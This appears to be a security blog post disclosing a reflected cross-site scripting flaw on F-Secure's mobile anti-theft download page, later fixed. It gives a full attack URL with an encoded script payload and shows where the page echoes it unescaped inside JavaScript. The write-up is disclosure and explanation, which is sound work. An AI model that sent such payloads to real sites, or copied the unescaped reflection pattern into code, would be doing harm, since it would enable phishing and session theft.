F-Secure XSS on Anti-Theft Website

In a new section supporting the release of an anti-theft product for mobile phones, the web site of Helsinki based anti-virus company F-Secure is vulnerable to cross site scripting (XSS).

XSS String

A hidden form field reflects values from a name value pair (hidManufacturer in this case) from the URL.

Attack URL:

http://www.f-secure.com/en_EMEA/products/mobile/anti-theft-download/anti-theft-download-
wizard.html?hidManufacturer=%27%22%3E%3C/title%3E%3Cscript%3Ealert%28/Mikko%20rulz/%29%3C
/script%3E

First reflection of URL XSS name-value pair:

<input type="hidden" name="hidManufacturer" id="hidManufacturer" value="\'\&quot;&gt;&lt;\/title&gt;&lt;
script&gt;alert(\/Mikko rulz\/)&lt;\/script&gt;"/></p>

But nothing happens on this reflection because much of what is passed in the URL (the bracket and quote characters) is encoded as &quote, &gt, &lt on the output of the page. This is generally recognized as a right practice to avoid many forms of cross site scripting attacks on web pages.

Unfortunately a Javascript later in the page is referencing the passed in string without any of the same encoding.

Second reflection in the page of the same value:

<script type="text/javascript">
    document.getElementById(''"></title><script>alert(/Mikko rulz/)</script>').setAttribute("class", 
"selected");
    document.getElementById(''"></title><script>alert(/Mikko rulz/)</script>').setAttribute("className", 
"selected");
</script>

A Javascript reflects values unencoded from a name value pair in the URL.


Finally

The Mikko reference is to Mikko Hypponen, the well known Chief Research Officer at F-Secure. The defect was submitted to XSSED by Xylitol. At a glance this appears to be the first new web site specific problem with the main F-Secure web site (country specific versions have had issues) since the F-Secure forum defacement in 2007.

Reflected cross site scripting attacks are on the low end of the scale when it comes to web application vulnerabilities, however they can be used effectively in phishing style attacks (ex: here is a URL to F-Secure, but I will attempt to steal a user session, redirect the user, serve them malware, etc. based on being able to execute a script as the F-Secure web site). As always it behooves a security company to correct problems like this fairly quickly, and F-Secure clearly knows what to do already since they’re using output encoding in one part of the page already.

Update 06/8/2010

The problem was corrected quickly, and the issue explained competently by Mikko, as expected.

Filed Under: Cross Site Scripting

Tags: , ,

Comments (3)

Trackback URL | Comments RSS Feed

  1. [...] types of flaws on an information security site the end of the world? We just wrote a story about F-Secure having something similar on their US site last week. The difference: F-Secure corrected the issue, and wrote a post [...]

  2. [...] types of flaws on an information security site the end of the world? We just wrote a story about F-Secure having something similar on their US site last week. The difference: F-Secure corrected the issue, and wrote a post [...]

  3. Beatification for Lebanese Maronite monk…

    My blog readers will be interested in your post so added a trackback to it on CatholicTide…